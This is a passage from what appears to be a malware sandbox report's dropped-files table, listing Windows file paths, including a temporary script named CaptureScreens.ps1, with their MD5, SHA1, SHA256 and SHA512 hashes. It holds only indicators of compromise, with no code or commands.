| SHA256 | 2e04667013ac5f9c6b463623e3fed0ad342930fbd9ed950b32ca4dfec3c74c50 |
| SHA512 | 81e020463e25c0392bb920d6a9677d29478985724533d7588c23429e0e9266ae22d33080f253b5911e21b8e83f0a4ba833c712ea1bbf7827b095eb938623053c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1
| MD5 | 3a4319f4c31d7a7124b5ce79395a6f24 |
| SHA1 | face51cf7e0a0b8220084251bf686ee4c68058b7 |
| SHA256 | e1af6bff2e0d7eaca0fa3498e2b23f4da02d6d2369c222f2534d186232fb7dbe |
| SHA512 | 4aae8eb857e52119c36317ce60159bebc4fc6496bf6b16a0a8eac5bbcefca27070614edef8419aa81bf53acb5370e7487aaae0b7799e6631c2c82b2b980fc6fe |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8baa55f4c9614712ef2edb673b84f197 |
| SHA1 | f95f528a8dbff1c7c8abbc320633ad0ec097c902 |
| SHA256 | e2f3a14489a2526cb4341b9e7220531e1f46c861ea11d0a1ed17c901f6a1bee3 |
| SHA512 | 899e33b413570a0a5008367e4286b675325635da89f5271c8b466ffd748c23066e96ec379532b2045c258114a9f3cbb202f32320b3769e414bb768119ec39cc3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d8b9a260789a22d72263ef3bb119108c |
| SHA1 | 376a9bd48726f422679f2cd65003442c0b6f6dd5 |
| SHA256 | d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc |
| SHA512 | 550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b |